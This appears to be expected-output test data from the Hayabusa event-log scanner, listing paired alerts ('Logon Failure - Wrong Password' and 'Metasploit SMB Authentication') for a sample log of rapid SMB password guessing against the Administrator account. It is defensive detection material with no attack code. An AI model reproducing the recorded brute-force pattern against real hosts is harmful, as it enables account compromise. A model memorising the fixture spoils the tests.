+2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2r5tyuIYijAXN5be  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AgjQNe9hQrLIETDn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KRNoInpFTsixZDIu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ladJUS6I0HMIwdef  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6oW63pJlVtjgn3YY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xKNu8b2To2Y1twUr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9sN5xm3GytfmM7G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtQQS61GYBm6WUUz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WxxawZZMhNCGHxc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sKP8G2VgJlrr9LMR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvOsNQpk3c5p1FgK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H7oz7NPh5Z8UrDPW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvzNFOLBlBv98Do4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8KJmYytO30Icc6Rb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zro3jLjFXWZ2o8VL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Z2J8VYeuxd9fKcG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXMjOKLfMex7OmMv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cgbm3YeoGxCa22Il  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7MEstBFjiWhVE18  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y8Y2kDEiMZWf0znn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zBAFVgPIOyCvtdRs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s3pFhUcspF6lzQXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 39LFXXW715pQoADC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: in4ewyxouUnxQzCQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zOtV8CLIU6Mcw2ty  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b8NJqimhGrg9uhTh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XEWLTOY9magV0h6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Di1MZsJx52Bi8E6k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 22MdB2QodynfibkF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qojej3YITXvXJ6Pe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CLjbQ6timbdQoufd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aZgoAnGEFwXN88bQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NZFWoL9XUMJdfNnY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x000TRnXfVtPAQSE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNHWWHDOpXQyNdrR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1irbPdOoUfvq1MXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dCflbKOMPJRXQHsD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zuy6nD4EXeGzEy5e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xkig4u0LIS9v3HMK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94RbUrUcMf6VhP8A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X9f7wCJ3wI9RmZTL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LkVs1viGo4RxhFaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OKMLt6t01vUDDq1s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xYSif8ADOkC8aInB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EpmraSe2sxFVupTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
